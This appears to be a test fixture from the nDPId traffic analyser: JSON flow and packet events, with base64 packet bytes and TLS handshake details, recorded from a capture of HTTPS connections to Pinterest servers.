-00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289712203,"flow_last_seen":1605289712203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289712203,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1605289712203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289712203,"pkt":"qtsDr8lk5EKm5WPyht1gAqhwACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBwAAAAAAACAKn6wBu\/7xm0eeabeVgBAB9aoLAAABAQgKp4B90cK4Zak="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605289712420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289712420,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgHAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbufrJ5pt5X+8ZtIgBAL8Z94AAABAQgKwrka9Kd\/yRw="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289713743,"flow_last_seen":1605289713743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289713743,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605289713743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289713743,"pkt":"qtsDr8lk5EKm5WPyht1gD\/cFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUge4Bu\/ur8QUAAAAAoAL9IIXGAAACBAWgBAIICs+qMG0AAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605289713761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289713761,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuB7prDGd77q\/EGoBJXgJPPAAACBAV4AQMDAwQCCArCuSBXz6owbQ=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1605289713761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289713761,"pkt":"qtsDr8lk5EKm5WPyht1gD\/cFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUge4Bu\/ur8QaawxnfgBAB+xfPAAABAQgKz6owf8K5IFc="} 
-00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289713743,"flow_last_seen":1605289713761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289713761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289713743,"flow_last_seen":1605289713802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289713802,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289713743,"flow_last_seen":1605289713803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1605289713803,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.
pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gBvDPACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnABu5Qp1R0AAAAAoAL9IJUzAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} 
-00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAzjWACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnIBu3hJrMAAAAAAoAL9INluAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gDFiUACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnQBu8NFBoQAAAAAoAL9IDStAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gC2HAACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnYBu\/iHMGkAAAAAoAL9INWDAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} 
-00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAI0zACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElngBu4oDE2UAAAAAoAL9IGEKAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAoQZACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnoBuzJfNsQAAAAAoAL9IJVNAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605289714171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714171,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWcPSVr2OUKdUeoBJXgLJJAAACBAV4AQMDAwQCCArCuSHy1mIgAw=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605289714171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714171,"pkt":"qtsDr8lk5EKm5WPyht1gBvDPACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnABu5Qp1R70la9kgBAB+zY+AAABAQgK1mIgIMK5IfI="} 
-00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714172,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605289714180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714180,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWdpoDqe34hzBqoBJXgFKZAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605289714180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714180,"pkt":"qtsDr8lk5EKm5WPyht1gC2HAACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnYBu\/iHMGqaA6nugBAB+9aEAAABAQgK1mIgKcK5Ifs="} 
-00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714180,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWdKO8RXbDRQaFoBJXgAyCAAACBAV4AQMDAwQCCArCuSH61mIgAw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWchkTOMV4SazBoBJXgEidAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWelCqgAoyXzbFoBJXgIWfAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWeOms5zmKAxNmoBJXgFEqAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gDFiUACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnQBu8NFBoWjvEV3gBAB+5BsAAABAQgK1mIgKsK5Ifo="} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAzjWACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnIBu3hJrMEZEzjGgBAB+8yHAAABAQgK1mIgKsK5Ifs="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAoQZACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnoBuzJfNsVQqoALgBAB+wmKAAABAQgK1mIgKsK5Ifs="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAI0zACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElngBu4oDE2bprOc6gBAB+9UUAAABAQgK1mIgKsK5Ifs="} 
-00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714181,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 